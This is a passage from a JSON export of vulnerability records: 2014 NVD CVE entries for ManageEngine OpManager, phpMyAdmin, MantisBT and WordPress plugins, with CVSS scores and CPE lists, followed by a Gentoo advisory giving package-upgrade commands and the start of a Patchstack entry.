"cpe:2.3:a:zohocorp:manageengine_opmanager:11.2:*:*:*:*:*:*:*", "cpe:2.3:a:zohocorp:manageengine_opmanager:11.3:*:*:*:*:*:*:*", "cpe:2.3:a:zohocorp:manageengine_opmanager:10.2:*:*:*:*:*:*:*", "cpe:2.3:a:zohocorp:manageengine_opmanager:9.0:*:*:*:*:*:*:*", "cpe:2.3:a:zohocorp:manageengine_opmanager:10.0:*:*:*:*:*:*:*", "cpe:2.3:a:zohocorp:manageengine_opmanager:9.1:*:*:*:*:*:*:*", "cpe:2.3:a:zohocorp:manageengine_opmanager:11.0:*:*:*:*:*:*:*", "cpe:2.3:a:zohocorp:manageengine_opmanager:9.2:*:*:*:*:*:*:*", "cpe:2.3:a:zohocorp:manageengine_it360:10.4:*:*:*:*:*:*:*", "cpe:2.3:a:zohocorp:manageengine_opmanager:9.4:*:*:*:*:*:*:*", "cpe:2.3:a:zohocorp:manageengine_opmanager:10.1:*:*:*:*:*:*:*", "cpe:2.3:a:zohocorp:manageengine_opmanager:8.8:*:*:*:*:*:*:*", "cpe:2.3:a:zohocorp:manageengine_social_it_plus:11.0:*:*:*:*:*:*:*"]}, {"lastseen": "2022-03-23T14:00:40", "description": "Directory traversal vulnerability in the multipartRequest servlet in ZOHO ManageEngine OpManager 11.3 and earlier, Social IT Plus 11.0, and IT360 10.3, 10.4, and earlier allows remote attackers or remote authenticated users to delete arbitrary files via a .. (dot dot) in the fileName parameter.", "cvss3": {}, "published": "2014-12-04T17:59:00", "type": "cve", "title": "CVE-2014-6036", "cwe": ["CWE-22"], "bulletinFamily": "NVD", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "NONE", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.4, "vectorString": "AV:N/AC:L/Au:N/C:N/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 4.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2014-6036"], "modified": "2019-07-15T17:45:00", "cpe": ["cpe:/a:zohocorp:manageengine_opmanager:11.3", "cpe:/a:zohocorp:manageengine_it360:10.4", "cpe:/a:zohocorp:manageengine_social_it_plus:11.0", "cpe:/a:zohocorp:manageengine_it360:10.3.0"], "id": "CVE-2014-6036", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2014-6036", "cvss": {"score": 6.4, "vector": "AV:N/AC:L/Au:N/C:N/I:P/A:P"}, "cpe23": ["cpe:2.3:a:zohocorp:manageengine_it360:10.3.0:*:*:*:*:*:*:*", "cpe:2.3:a:zohocorp:manageengine_it360:10.4:*:*:*:*:*:*:*", "cpe:2.3:a:zohocorp:manageengine_opmanager:11.3:*:*:*:*:*:*:*", "cpe:2.3:a:zohocorp:manageengine_social_it_plus:11.0:*:*:*:*:*:*:*"]}, {"lastseen": "2022-03-23T14:06:58", "description": "Multiple SQL injection vulnerabilities in the All In One WP Security & Firewall plugin before 3.8.3 for WordPress allow remote authenticated users to execute arbitrary SQL commands via the (1) orderby or (2) order parameter in the aiowpsec page to wp-admin/admin.php. NOTE: this can be leveraged using CSRF to allow remote attackers to execute arbitrary SQL commands.", "cvss3": {}, "published": "2014-10-02T14:55:00", "type": "cve", "title": "CVE-2014-6242", "cwe": ["CWE-89"], "bulletinFamily": "NVD", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.5, "vectorString": "AV:N/AC:L/Au:S/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "SINGLE"}, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2014-6242"], "modified": "2018-10-09T19:50:00", "cpe": ["cpe:/a:tips_and_tricks_hq:all_in_one_wordpress_security_and_firewall:3.8.2"], "id": "CVE-2014-6242", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2014-6242", "cvss": {"score": 6.5, "vector": "AV:N/AC:L/Au:S/C:P/I:P/A:P"}, "cpe23": ["cpe:2.3:a:tips_and_tricks_hq:all_in_one_wordpress_security_and_firewall:3.8.2:*:*:*:*:wordpress:*:*"]}, {"lastseen": "2022-03-23T14:00:38", "description": "Directory traversal vulnerability in the FileCollector servlet in ZOHO ManageEngine OpManager 11.4, 11.3, and earlier allows remote attackers to write and execute arbitrary files via a .. (dot dot) in the FILENAME parameter.", "cvss3": {}, "published": "2014-12-04T17:59:00", "type": "cve", "title": "CVE-2014-6035", "cwe": ["CWE-22"], "bulletinFamily": "NVD", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2014-6035"], "modified": "2014-12-05T13:33:00", "cpe": ["cpe:/a:zohocorp:manageengine_opmanager:11.4", "cpe:/a:zohocorp:manageengine_opmanager:11.3"], "id": "CVE-2014-6035", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2014-6035", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "cpe23": ["cpe:2.3:a:zohocorp:manageengine_opmanager:11.3:*:*:*:*:*:*:*", "cpe:2.3:a:zohocorp:manageengine_opmanager:11.4:*:*:*:*:*:*:*"]}, {"lastseen": "2022-03-23T13:32:25", "description": "server_user_groups.php in phpMyAdmin 4.1.x before 4.1.14.2 and 4.2.x before 4.2.6 allows remote authenticated users to bypass intended access restrictions and read the MySQL user list via a viewUsers request.", "cvss3": {}, "published": "2014-07-20T11:12:00", "type": "cve", "title": "CVE-2014-4987", "cwe": ["CWE-264"], "bulletinFamily": "NVD", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "NONE", "integrityImpact": "NONE", "baseScore": 4.0, "vectorString": "AV:N/AC:L/Au:S/C:P/I:N/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "SINGLE"}, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2014-4987"], "modified": "2018-10-30T16:27:00", "cpe": ["cpe:/a:phpmyadmin:phpmyadmin:4.1.11", "cpe:/a:phpmyadmin:phpmyadmin:4.1.8", "cpe:/a:phpmyadmin:phpmyadmin:4.2.1", "cpe:/a:phpmyadmin:phpmyadmin:4.1.5", "cpe:/a:phpmyadmin:phpmyadmin:4.1.12", "cpe:/a:phpmyadmin:phpmyadmin:4.1.14", "cpe:/a:phpmyadmin:phpmyadmin:4.1.13", "cpe:/o:opensuse:opensuse:12.3", "cpe:/a:phpmyadmin:phpmyadmin:4.2.4", "cpe:/a:phpmyadmin:phpmyadmin:4.1.4", "cpe:/a:phpmyadmin:phpmyadmin:4.1.1", "cpe:/a:phpmyadmin:phpmyadmin:4.2.5", "cpe:/a:phpmyadmin:phpmyadmin:4.1.14.1", "cpe:/a:phpmyadmin:phpmyadmin:4.1.6", "cpe:/a:phpmyadmin:phpmyadmin:4.1.9", "cpe:/a:phpmyadmin:phpmyadmin:4.1.2", "cpe:/a:phpmyadmin:phpmyadmin:4.1.7", "cpe:/a:phpmyadmin:phpmyadmin:4.2.2", "cpe:/a:phpmyadmin:phpmyadmin:4.1.0", "cpe:/a:phpmyadmin:phpmyadmin:4.2.0", "cpe:/o:opensuse:opensuse:13.1", "cpe:/a:phpmyadmin:phpmyadmin:4.1.10", "cpe:/a:phpmyadmin:phpmyadmin:4.2.3", "cpe:/a:phpmyadmin:phpmyadmin:4.1.3"], "id": "CVE-2014-4987", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2014-4987", "cvss": {"score": 4.0, "vector": "AV:N/AC:L/Au:S/C:P/I:N/A:N"}, "cpe23": ["cpe:2.3:a:phpmyadmin:phpmyadmin:4.1.8:*:*:*:*:*:*:*", "cpe:2.3:a:phpmyadmin:phpmyadmin:4.1.5:*:*:*:*:*:*:*", "cpe:2.3:a:phpmyadmin:phpmyadmin:4.2.2:*:*:*:*:*:*:*", "cpe:2.3:a:phpmyadmin:phpmyadmin:4.1.13:*:*:*:*:*:*:*", "cpe:2.3:a:phpmyadmin:phpmyadmin:4.2.4:*:*:*:*:*:*:*", "cpe:2.3:o:opensuse:opensuse:12.3:*:*:*:*:*:*:*", "cpe:2.3:a:phpmyadmin:phpmyadmin:4.1.9:*:*:*:*:*:*:*", "cpe:2.3:o:opensuse:opensuse:13.1:*:*:*:*:*:*:*", "cpe:2.3:a:phpmyadmin:phpmyadmin:4.2.1:*:*:*:*:*:*:*", "cpe:2.3:a:phpmyadmin:phpmyadmin:4.1.3:*:*:*:*:*:*:*", "cpe:2.3:a:phpmyadmin:phpmyadmin:4.1.1:*:*:*:*:*:*:*", "cpe:2.3:a:phpmyadmin:phpmyadmin:4.1.11:*:*:*:*:*:*:*", "cpe:2.3:a:phpmyadmin:phpmyadmin:4.1.14:*:*:*:*:*:*:*", "cpe:2.3:a:phpmyadmin:phpmyadmin:4.1.7:*:*:*:*:*:*:*", "cpe:2.3:a:phpmyadmin:phpmyadmin:4.1.4:*:*:*:*:*:*:*", "cpe:2.3:a:phpmyadmin:phpmyadmin:4.2.3:*:*:*:*:*:*:*", "cpe:2.3:a:phpmyadmin:phpmyadmin:4.2.0:*:*:*:*:*:*:*", "cpe:2.3:a:phpmyadmin:phpmyadmin:4.1.2:*:*:*:*:*:*:*", "cpe:2.3:a:phpmyadmin:phpmyadmin:4.1.12:*:*:*:*:*:*:*", "cpe:2.3:a:phpmyadmin:phpmyadmin:4.1.10:*:*:*:*:*:*:*", "cpe:2.3:a:phpmyadmin:phpmyadmin:4.2.5:*:*:*:*:*:*:*", "cpe:2.3:a:phpmyadmin:phpmyadmin:4.1.0:*:*:*:*:*:*:*", "cpe:2.3:a:phpmyadmin:phpmyadmin:4.1.14.1:*:*:*:*:*:*:*", "cpe:2.3:a:phpmyadmin:phpmyadmin:4.1.6:*:*:*:*:*:*:*"]}, {"lastseen": "2022-03-23T13:32:23", "description": "Multiple cross-site scripting (XSS) vulnerabilities in js/functions.js in phpMyAdmin 4.0.x before 4.0.10.1, 4.1.x before 4.1.14.2, and 4.2.x before 4.2.6 allow remote authenticated users to inject arbitrary web script or HTML via a crafted (1) table name or (2) column name that is improperly handled during construction of an AJAX confirmation message.", "cvss3": {}, "published": "2014-07-20T11:12:00", "type": "cve", "title": "CVE-2014-4986", "cwe": ["CWE-79"], "bulletinFamily": "NVD", "cvss2": {"severity": "LOW", "exploitabilityScore": 6.8, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "NONE", "availabilityImpact": "NONE", "integrityImpact": "PARTIAL", "baseScore": 3.5, "vectorString": "AV:N/AC:M/Au:S/C:N/I:P/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "SINGLE"}, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2014-4986"], "modified": "2016-12-22T02:59:00", "cpe": ["cpe:/a:phpmyadmin:phpmyadmin:4.1.11", "cpe:/a:phpmyadmin:phpmyadmin:4.0.10", "cpe:/a:phpmyadmin:phpmyadmin:4.1.8", "cpe:/a:phpmyadmin:phpmyadmin:4.1.5", "cpe:/a:phpmyadmin:phpmyadmin:4.2.1", "cpe:/a:phpmyadmin:phpmyadmin:4.0.9", "cpe:/a:phpmyadmin:phpmyadmin:4.1.12", "cpe:/a:phpmyadmin:phpmyadmin:4.1.14", "cpe:/a:phpmyadmin:phpmyadmin:4.1.13", "cpe:/a:phpmyadmin:phpmyadmin:4.0.2", "cpe:/a:phpmyadmin:phpmyadmin:4.2.4", "cpe:/a:phpmyadmin:phpmyadmin:4.0.0", "cpe:/a:phpmyadmin:phpmyadmin:4.0.4", "cpe:/a:phpmyadmin:phpmyadmin:4.0.8", "cpe:/a:phpmyadmin:phpmyadmin:4.0.1", "cpe:/a:phpmyadmin:phpmyadmin:4.1.4", "cpe:/a:phpmyadmin:phpmyadmin:4.1.1", "cpe:/a:phpmyadmin:phpmyadmin:4.1.6", "cpe:/a:phpmyadmin:phpmyadmin:4.1.14.1", "cpe:/a:phpmyadmin:phpmyadmin:4.2.5", "cpe:/a:phpmyadmin:phpmyadmin:4.1.9", "cpe:/a:phpmyadmin:phpmyadmin:4.1.2", "cpe:/a:phpmyadmin:phpmyadmin:4.1.7", "cpe:/a:phpmyadmin:phpmyadmin:4.0.3", "cpe:/a:phpmyadmin:phpmyadmin:4.0.4.1", "cpe:/a:phpmyadmin:phpmyadmin:4.2.2", "cpe:/a:phpmyadmin:phpmyadmin:4.0.5", "cpe:/a:phpmyadmin:phpmyadmin:4.0.7", "cpe:/a:phpmyadmin:phpmyadmin:4.1.0", "cpe:/a:phpmyadmin:phpmyadmin:4.2.0", "cpe:/a:phpmyadmin:phpmyadmin:4.0.6", "cpe:/a:phpmyadmin:phpmyadmin:4.1.10", "cpe:/a:phpmyadmin:phpmyadmin:4.2.3", "cpe:/a:phpmyadmin:phpmyadmin:4.0.4.2", "cpe:/a:phpmyadmin:phpmyadmin:4.0.10.0", "cpe:/a:phpmyadmin:phpmyadmin:4.1.3"], "id": "CVE-2014-4986", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2014-4986", "cvss": {"score": 3.5, "vector": "AV:N/AC:M/Au:S/C:N/I:P/A:N"}, "cpe23": ["cpe:2.3:a:phpmyadmin:phpmyadmin:4.1.8:*:*:*:*:*:*:*", "cpe:2.3:a:phpmyadmin:phpmyadmin:4.1.5:*:*:*:*:*:*:*", "cpe:2.3:a:phpmyadmin:phpmyadmin:4.2.2:*:*:*:*:*:*:*", "cpe:2.3:a:phpmyadmin:phpmyadmin:4.1.13:*:*:*:*:*:*:*", "cpe:2.3:a:phpmyadmin:phpmyadmin:4.2.4:*:*:*:*:*:*:*", "cpe:2.3:a:phpmyadmin:phpmyadmin:4.0.10.0:*:*:*:*:*:*:*", "cpe:2.3:a:phpmyadmin:phpmyadmin:4.1.9:*:*:*:*:*:*:*", "cpe:2.3:a:phpmyadmin:phpmyadmin:4.0.0:rc2:*:*:*:*:*:*", "cpe:2.3:a:phpmyadmin:phpmyadmin:4.0.0:*:*:*:*:*:*:*", "cpe:2.3:a:phpmyadmin:phpmyadmin:4.2.1:*:*:*:*:*:*:*", "cpe:2.3:a:phpmyadmin:phpmyadmin:4.0.4.2:*:*:*:*:*:*:*", "cpe:2.3:a:phpmyadmin:phpmyadmin:4.1.3:*:*:*:*:*:*:*", "cpe:2.3:a:phpmyadmin:phpmyadmin:4.1.1:*:*:*:*:*:*:*", "cpe:2.3:a:phpmyadmin:phpmyadmin:4.1.11:*:*:*:*:*:*:*", "cpe:2.3:a:phpmyadmin:phpmyadmin:4.0.8:*:*:*:*:*:*:*", "cpe:2.3:a:phpmyadmin:phpmyadmin:4.0.3:*:*:*:*:*:*:*", "cpe:2.3:a:phpmyadmin:phpmyadmin:4.0.4.1:*:*:*:*:*:*:*", "cpe:2.3:a:phpmyadmin:phpmyadmin:4.1.14:*:*:*:*:*:*:*", "cpe:2.3:a:phpmyadmin:phpmyadmin:4.1.7:*:*:*:*:*:*:*", "cpe:2.3:a:phpmyadmin:phpmyadmin:4.1.4:*:*:*:*:*:*:*", "cpe:2.3:a:phpmyadmin:phpmyadmin:4.2.3:*:*:*:*:*:*:*", "cpe:2.3:a:phpmyadmin:phpmyadmin:4.2.0:*:*:*:*:*:*:*", "cpe:2.3:a:phpmyadmin:phpmyadmin:4.1.2:*:*:*:*:*:*:*", "cpe:2.3:a:phpmyadmin:phpmyadmin:4.0.9:*:*:*:*:*:*:*", "cpe:2.3:a:phpmyadmin:phpmyadmin:4.0.7:*:*:*:*:*:*:*", "cpe:2.3:a:phpmyadmin:phpmyadmin:4.1.12:*:*:*:*:*:*:*", "cpe:2.3:a:phpmyadmin:phpmyadmin:4.0.10:*:*:*:*:*:*:*", "cpe:2.3:a:phpmyadmin:phpmyadmin:4.1.10:*:*:*:*:*:*:*", "cpe:2.3:a:phpmyadmin:phpmyadmin:4.0.6:*:*:*:*:*:*:*", "cpe:2.3:a:phpmyadmin:phpmyadmin:4.2.5:*:*:*:*:*:*:*", "cpe:2.3:a:phpmyadmin:phpmyadmin:4.0.4:*:*:*:*:*:*:*", "cpe:2.3:a:phpmyadmin:phpmyadmin:4.0.5:*:*:*:*:*:*:*", "cpe:2.3:a:phpmyadmin:phpmyadmin:4.0.0:rc3:*:*:*:*:*:*", "cpe:2.3:a:phpmyadmin:phpmyadmin:4.1.0:*:*:*:*:*:*:*", "cpe:2.3:a:phpmyadmin:phpmyadmin:4.1.14.1:*:*:*:*:*:*:*", "cpe:2.3:a:phpmyadmin:phpmyadmin:4.1.6:*:*:*:*:*:*:*", "cpe:2.3:a:phpmyadmin:phpmyadmin:4.0.2:*:*:*:*:*:*:*", "cpe:2.3:a:phpmyadmin:phpmyadmin:4.0.1:*:*:*:*:*:*:*"]}, {"lastseen": "2022-03-23T13:13:26", "description": "Multiple cross-site scripting (XSS) vulnerabilities in phpMyAdmin 4.1.x before 4.1.14.1 and 4.2.x before 4.2.4 allow remote authenticated users to inject arbitrary web script or HTML via a crafted table name that is improperly handled after a (1) hide or (2) unhide action.", "cvss3": {}, "published": "2014-06-25T11:19:00", "type": "cve", "title": "CVE-2014-4349", "cwe": ["CWE-79"], "bulletinFamily": "NVD", "cvss2": {"severity": "LOW", "exploitabilityScore": 6.8, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "NONE", "availabilityImpact": "NONE", "integrityImpact": "PARTIAL", "baseScore": 3.5, "vectorString": "AV:N/AC:M/Au:S/C:N/I:P/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "SINGLE"}, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2014-4349"], "modified": "2015-09-02T17:11:00", "cpe": ["cpe:/a:phpmyadmin:phpmyadmin:4.1.11", "cpe:/a:phpmyadmin:phpmyadmin:4.1.8", "cpe:/a:phpmyadmin:phpmyadmin:4.2.1", "cpe:/a:phpmyadmin:phpmyadmin:4.1.5", "cpe:/a:phpmyadmin:phpmyadmin:4.1.12", "cpe:/a:phpmyadmin:phpmyadmin:4.1.14", "cpe:/a:phpmyadmin:phpmyadmin:4.1.13", "cpe:/a:phpmyadmin:phpmyadmin:4.1.4", "cpe:/a:phpmyadmin:phpmyadmin:4.1.1", "cpe:/a:phpmyadmin:phpmyadmin:4.1.6", "cpe:/a:phpmyadmin:phpmyadmin:4.1.9", "cpe:/a:phpmyadmin:phpmyadmin:4.1.2", "cpe:/a:phpmyadmin:phpmyadmin:4.1.7", "cpe:/a:phpmyadmin:phpmyadmin:4.2.2", "cpe:/a:phpmyadmin:phpmyadmin:4.1.0", "cpe:/a:phpmyadmin:phpmyadmin:4.2.0", "cpe:/a:phpmyadmin:phpmyadmin:4.1.10", "cpe:/a:phpmyadmin:phpmyadmin:4.2.3", "cpe:/a:phpmyadmin:phpmyadmin:4.1.3"], "id": "CVE-2014-4349", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2014-4349", "cvss": {"score": 3.5, "vector": "AV:N/AC:M/Au:S/C:N/I:P/A:N"}, "cpe23": ["cpe:2.3:a:phpmyadmin:phpmyadmin:4.1.8:*:*:*:*:*:*:*", "cpe:2.3:a:phpmyadmin:phpmyadmin:4.1.5:*:*:*:*:*:*:*", "cpe:2.3:a:phpmyadmin:phpmyadmin:4.2.2:*:*:*:*:*:*:*", "cpe:2.3:a:phpmyadmin:phpmyadmin:4.1.13:*:*:*:*:*:*:*", "cpe:2.3:a:phpmyadmin:phpmyadmin:4.1.9:*:*:*:*:*:*:*", "cpe:2.3:a:phpmyadmin:phpmyadmin:4.2.1:*:*:*:*:*:*:*", "cpe:2.3:a:phpmyadmin:phpmyadmin:4.1.3:*:*:*:*:*:*:*", "cpe:2.3:a:phpmyadmin:phpmyadmin:4.1.1:*:*:*:*:*:*:*", "cpe:2.3:a:phpmyadmin:phpmyadmin:4.1.11:*:*:*:*:*:*:*", "cpe:2.3:a:phpmyadmin:phpmyadmin:4.1.14:*:*:*:*:*:*:*", "cpe:2.3:a:phpmyadmin:phpmyadmin:4.1.7:*:*:*:*:*:*:*", "cpe:2.3:a:phpmyadmin:phpmyadmin:4.1.4:*:*:*:*:*:*:*", "cpe:2.3:a:phpmyadmin:phpmyadmin:4.2.3:*:*:*:*:*:*:*", "cpe:2.3:a:phpmyadmin:phpmyadmin:4.2.0:*:*:*:*:*:*:*", "cpe:2.3:a:phpmyadmin:phpmyadmin:4.1.2:*:*:*:*:*:*:*", "cpe:2.3:a:phpmyadmin:phpmyadmin:4.1.12:*:*:*:*:*:*:*", "cpe:2.3:a:phpmyadmin:phpmyadmin:4.1.10:*:*:*:*:*:*:*", "cpe:2.3:a:phpmyadmin:phpmyadmin:4.1.0:*:*:*:*:*:*:*", "cpe:2.3:a:phpmyadmin:phpmyadmin:4.1.6:*:*:*:*:*:*:*"]}, {"lastseen": "2022-03-23T14:07:01", "description": "Cross-site scripting (XSS) vulnerability in the EWWW Image Optimizer plugin before 2.0.2 for WordPress allows remote attackers to inject arbitrary web script or HTML via the error parameter in the ewww-image-optimizer.php page to wp-admin/options-general.php, which is not properly handled in a pngout error message.", "cvss3": {}, "published": "2014-10-10T14:55:00", "type": "cve", "title": "CVE-2014-6243", "cwe": ["CWE-79"], "bulletinFamily": "NVD", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "NONE", "availabilityImpact": "NONE", "integrityImpact": "PARTIAL", "baseScore": 4.3, "vectorString": "AV:N/AC:M/Au:N/C:N/I:P/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2014-6243"], "modified": "2018-10-09T19:50:00", "cpe": ["cpe:/a:ewww_image_optimizer_plugin_project:ewww_image_optimizer_plugin:2.0.0", "cpe:/a:ewww_image_optimizer_plugin_project:ewww_image_optimizer_plugin:2.01"], "id": "CVE-2014-6243", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2014-6243", "cvss": {"score": 4.3, "vector": "AV:N/AC:M/Au:N/C:N/I:P/A:N"}, "cpe23": ["cpe:2.3:a:ewww_image_optimizer_plugin_project:ewww_image_optimizer_plugin:2.01:*:*:*:*:wordpress:*:*", "cpe:2.3:a:ewww_image_optimizer_plugin_project:ewww_image_optimizer_plugin:2.0.0:*:*:*:*:wordpress:*:*"]}, {"lastseen": "2022-03-23T12:24:31", "description": "SQL injection vulnerability in the mci_file_get function in api/soap/mc_file_api.php in MantisBT before 1.2.16 allows remote attackers to execute arbitrary SQL commands via a crafted envelope tag in a mc_issue_attachment_get SOAP request.", "cvss3": {}, "published": "2014-03-18T17:03:00", "type": "cve", "title": "CVE-2014-1608", "cwe": ["CWE-89"], "bulletinFamily": "NVD", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2014-1608"], "modified": "2021-01-12T18:05:00", "cpe": ["cpe:/a:mantisbt:mantisbt:1.2.11", "cpe:/a:mantisbt:mantisbt:1.2.10", "cpe:/a:mantisbt:mantisbt:1.2.0", "cpe:/a:mantisbt:mantisbt:1.2.3", "cpe:/a:mantisbt:mantisbt:1.2.6", "cpe:/a:mantisbt:mantisbt:1.2.15", "cpe:/a:mantisbt:mantisbt:1.2.7", "cpe:/o:debian:debian_linux:7.0", "cpe:/a:mantisbt:mantisbt:1.2.4", "cpe:/a:mantisbt:mantisbt:1.2.8", "cpe:/a:mantisbt:mantisbt:1.2.9", "cpe:/a:mantisbt:mantisbt:1.2.2", "cpe:/a:mantisbt:mantisbt:1.2.13", "cpe:/a:mantisbt:mantisbt:1.2.1", "cpe:/a:mantisbt:mantisbt:1.2.5", "cpe:/a:mantisbt:mantisbt:1.2.14"], "id": "CVE-2014-1608", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2014-1608", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "cpe23": ["cpe:2.3:a:mantisbt:mantisbt:1.2.4:*:*:*:*:*:*:*", "cpe:2.3:a:mantisbt:mantisbt:1.2.0:*:*:*:*:*:*:*", "cpe:2.3:a:mantisbt:mantisbt:1.2.0:rc2:*:*:*:*:*:*", "cpe:2.3:a:mantisbt:mantisbt:1.2.5:*:*:*:*:*:*:*", "cpe:2.3:a:mantisbt:mantisbt:1.2.0:alpha3:*:*:*:*:*:*", "cpe:2.3:a:mantisbt:mantisbt:1.2.7:*:*:*:*:*:*:*", "cpe:2.3:a:mantisbt:mantisbt:1.2.15:*:*:*:*:*:*:*", "cpe:2.3:a:mantisbt:mantisbt:1.2.11:*:*:*:*:*:*:*", "cpe:2.3:a:mantisbt:mantisbt:1.2.0:rc1:*:*:*:*:*:*", "cpe:2.3:a:mantisbt:mantisbt:1.2.13:*:*:*:*:*:*:*", "cpe:2.3:a:mantisbt:mantisbt:1.2.2:*:*:*:*:*:*:*", "cpe:2.3:a:mantisbt:mantisbt:1.2.0:alpha1:*:*:*:*:*:*", "cpe:2.3:o:debian:debian_linux:7.0:*:*:*:*:*:*:*", "cpe:2.3:a:mantisbt:mantisbt:1.2.0:alpha2:*:*:*:*:*:*", "cpe:2.3:a:mantisbt:mantisbt:1.2.14:*:*:*:*:*:*:*", "cpe:2.3:a:mantisbt:mantisbt:1.2.6:*:*:*:*:*:*:*", "cpe:2.3:a:mantisbt:mantisbt:1.2.1:*:*:*:*:*:*:*", "cpe:2.3:a:mantisbt:mantisbt:1.2.9:*:*:*:*:*:*:*", "cpe:2.3:a:mantisbt:mantisbt:1.2.3:*:*:*:*:*:*:*", "cpe:2.3:a:mantisbt:mantisbt:1.2.8:*:*:*:*:*:*:*", "cpe:2.3:a:mantisbt:mantisbt:1.2.10:*:*:*:*:*:*:*"]}], "gentoo": [{"lastseen": "2022-01-17T19:07:00", "description": "### Background\n\nphpMyAdmin is a web-based management tool for MySQL databases.\n\n### Description\n\nMultiple vulnerabilities have been discovered in phpMyAdmin. Please review the CVE identifiers referenced below for details. \n\n### Impact\n\nA remote authenticated attacker could exploit these vulnerabilities to include and execute arbitrary local files via a crafted parameter, inject SQL code, or to conduct Cross-Site Scripting attacks. \n\n### Workaround\n\nThere is no known workaround at this time.\n\n### Resolution\n\nAll phpMyAdmin 4.2 users should upgrade to the latest version:\n \n \n # emerge --sync\n # emerge --ask --oneshot --verbose \">=dev-db/phpmyadmin-4.2.13\"\n \n\nAll phpMyAdmin 4.1 users should upgrade to the latest version:\n \n \n # emerge --sync\n # emerge --ask --oneshot --verbose \">=dev-db/phpmyadmin-4.1.14.7\"\n \n\nAll phpMyAdmin 4.0 users should upgrade to the latest version:\n \n \n # emerge --sync\n # emerge --ask --oneshot --verbose \">=dev-db/phpmyadmin-4.0.10.6\"", "cvss3": {}, "published": "2015-05-31T00:00:00", "type": "gentoo", "title": "phpMyAdmin: Multiple vulnerabilities", "bulletinFamily": "unix", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.5, "vectorString": "AV:N/AC:L/Au:S/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "SINGLE"}, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2014-4986", "CVE-2014-4987", "CVE-2014-6300", "CVE-2014-8958", "CVE-2014-8959", "CVE-2014-8960", "CVE-2014-8961"], "modified": "2016-05-14T00:00:00", "id": "GLSA-201505-03", "href": "https://security.gentoo.org/glsa/201505-03", "cvss": {"score": 6.5, "vector": "AV:N/AC:L/Au:S/C:P/I:P/A:P"}}], "patchstack": [{"lastseen": "2022-06-01T19:47:47", "description": "Because of this vulnerability, the attackers can inject arbitrary web script or HTML via the \"gce_feed_ids\" parameter in a gce_ajax action to wp-admin/admin-ajax.php. \n\n## Solution\n\n\r\n Update the plugin. \r\n ", "cvss3": {}, "published": "2014-09-22T00:00:00", "type": 